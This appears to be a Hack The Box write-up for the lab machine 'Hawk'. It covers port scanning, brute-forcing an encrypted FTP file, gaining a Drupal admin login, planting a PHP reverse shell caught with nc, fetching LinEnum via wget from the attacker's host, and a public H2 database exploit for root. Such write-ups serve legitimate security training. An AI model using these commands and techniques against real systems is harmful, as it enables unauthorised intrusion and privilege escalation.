Hawk – Hackthebox.eu

This box requires you to fumble around with SSL and .enc files. Takes some bruteforcing and luck…

Enumeration

Nmap ftw.

nmap -sC -sV -o- -oA initial 10.10.10.102

 Nmap 7.70 scan initiated Wed Jul 18 18:42:26 2018 as: nmap -sC -sV -p- -oA inital 10.10.10.102
Nmap scan report for 10.10.10.102
Host is up (0.030s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Jun 16 22:21 messages
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.23
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e4:0c:cb:c5:a5:91:78:ea:54:96:af:4d:03:e4:fc:88 (RSA)
| 256 95:cb:f8:c7:35:5e:af:a9:44:8b:17:59:4d:db:5a:df (ECDSA)
|_ 256 4a:0b:2e:f7:1d:99:bc:c7:d3:0b:91:53:b9:3b:e2:79 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome to 192.168.56.103 | 192.168.56.103
5435/tcp open tcpwrapped
8082/tcp open http H2 database http console
|_http-title: H2 Console
9092/tcp open XmlIpcRegSvc?


So we have HTTP (80), SSH (22), FTP (21), HTTP H2 database (8082) and some random stuff (5435, 9092). Lets start by browsing the FTP port.

ftp 10.10.10.102
Connected to 10.10.10.102.
220 (vsFTPd 3.0.3)
Name (10.10.10.102:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jun 16 22:21 messages
226 Directory send OK.
ftp> cd messages
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -lhra
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 240 Jun 16 22:21 .drupal.txt.enc
drwxr-xr-x 3 ftp ftp 4096 Jun 16 22:14 ..
drwxr-xr-x 2 ftp ftp 4096 Jun 16 22:21 .
226 Directory send OK.
ftp> get .drupal.txt.enc
local: .drupal.txt.enc remote: .drupal.txt.enc
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .drupal.txt.enc (240 bytes).
226 Transfer complete.
240 bytes received in 0.00 secs (1.4486 MB/s)
ftp> exit
221 Goodbye.


What you see above is that I connected to the FTP server, logged in anonymously. the initial ls command didn’t show anything, but using ls -lhra (including showing hidden files) shows a hidden file (recognizable by the .) called .drupal.txt.enc.

A file with .enc extension means that the file is encrypted. You can verify this with the file command:

file drupal.txt.enc
drupal.txt.enc: openssl enc'd data with salted password, base64 encoded

Lets use base64 to decode the content.

base64 -d drupal.txt.enc > drupal.txt.decoded

After reading up on (SSL) encryption through this link, I decided to use bruteforce-salted-openssl with the rockyou wordlist. I guess I got lucky here and selected the correct cipher (AES-256-CBC) and digest (SHA256) for for decryption.

bruteforce-salted-openssl -v 10 -t 6 -f /usr/share/wordlists/rockyou.txt -d sha256 ciphertext
Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.

Tried passwords: 31
Tried passwords per second: inf
Last tried password: pretty

Password candidate: friends
Tried passwords: 6255562
Tried passwords per second: 625556.200000
Last tried password: lester2411

Tried passwords: 13280069
Tried passwords per second: 664003.450000
Last tried password: 13413011

Lets use the ‘friends’ password to decrypt the file

openssl aes-256-cbc -d -in drupal.txt.decoded -out login.txt -k friends
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.

cat login.txt

Daniel,

Following the password for the portal:

[P]encilKeyboardScanner123

Please let us know when the portal is ready.

Kind Regards,

IT department

So we have the password for the drupal site.  Password = [P]encilKeyboardScanner123. Lets start exploiting the Drupal site.

Exploitation

I’ve tried logging into the site with the username ‘admin’ and the aforementioned password. And voila, I was logged in.

Whenever I encounter a CMS system like this, I will try to get a php reverse shell, since most of these systems support php. However, on Drupal you need to enable this since it is not enabled my default. Just to be certain, I also run droopescan to see if any vulnerabilities show up. I did  an unauthenticated scan, just to see what came back.

droopescan scan -u 10.10.10.102
[+] Site identified as drupal.
[+] Themes found: 
seven http://10.10.10.102/themes/seven/
garland http://10.10.10.102/themes/garland/

[+] Possible interesting urls found:
Default changelog file - http://10.10.10.102/CHANGELOG.txt
Default admin - http://10.10.10.102/user/login

[+] Possible version(s):
7.58

[+] Plugins found:
image http://10.10.10.102/modules/image/
profile http://10.10.10.102/modules/profile/
php http://10.10.10.102/modules/php/


Version 7.58 is not vulnerable to Drupalgeddon2 and nothing really stands out. So let’s continue down the PHP path. Enable php filter through the modules page.

I have good experiences with the laudanum  php reverse shell, which is the one created by pentest monkey. Laudanum should be in most pentesting distro’s (at least Kali and Parrot), use locate to find it:

locate shell | grep php


*Snip*<br data-mce-bogus="1">

/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/php/shell.php


Copy paste the content op php-reverse-shell.php into a new article. Set the format tot PHP code. Don’t forget to edit the IP and port field. Press add or preview when done and…

nc -lnvp 8082
listening on [any] 8082 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.102] 36426
Linux hawk 4.15.0-23-generic #25-Ubuntu SMP Wed May 23 18:02:16 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
12:39:36 up 5 days, 14:13, 0 users, load average: 0.00, 0.00, 0.04
USER TTY FROM [email protected] IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

$ whoami
www-data

Browse to /home/daniel/user.txt for the user flag.

Privilege Escalation

I order to do some additional enumeration on the box, I pulled in LinEnum.sh and ran it from /tmp. I did this by running a simple HTTP server on my machine and using wget on the Hawk machine to pull the script in.

On my machine, in the folder in which LinEnum.sh is located:

python -m SimpleHTTPServer 8081

On the Hawk machine, I wentto /tmp so I have a place to write files to and then:

wget ipofmymachine:8081/LinEnum.sh

After running LinEnum.sh, I saw the following result:

root 818 0.0 0.0 4628 864 ? Ss Dec09 0:00 /bin/sh -c /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar
root 819 0.1 4.9 2329256 49160 ? Sl Dec09 9:22 /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar


This looks like the H2 database that is running on port 8082. It seems like the proces is running as root. That’s interesting. It even specifies the version. Let’s look into searchsploit:

searchsploit H2 Database


*SNIP*<br data-mce-bogus="1">

H2 Database - 'Alias' Arbitrary Code Execution | exploits/java/local/44422.py
H2 Database 1.4.196 - Remote Code Execution | exploits/java/webapps/45506.py
H2 Database 1.4.197 - Information Disclosure | exploits/linux/webapps/45105.py

Ah yes, remote code execution. Sounds like the thing we need. I just copied the contents of that file into exploit.py. Then I used the wget method as noted above to copy the file to Hawk. Execute to get:

[email protected]:/tmp$ python3 exploit.py -H 127.0.0.1:8082
python3 exploit.py -H 127.0.0.1:8082
[*] Attempting to create database
[+] Created database and logged in
[*] Sending stage 1
[+] Shell succeeded - ^c or quit to exit

h2-shell$ whoami
root

h2-shell$

Done!

As always, excellent video by ippsec on this box.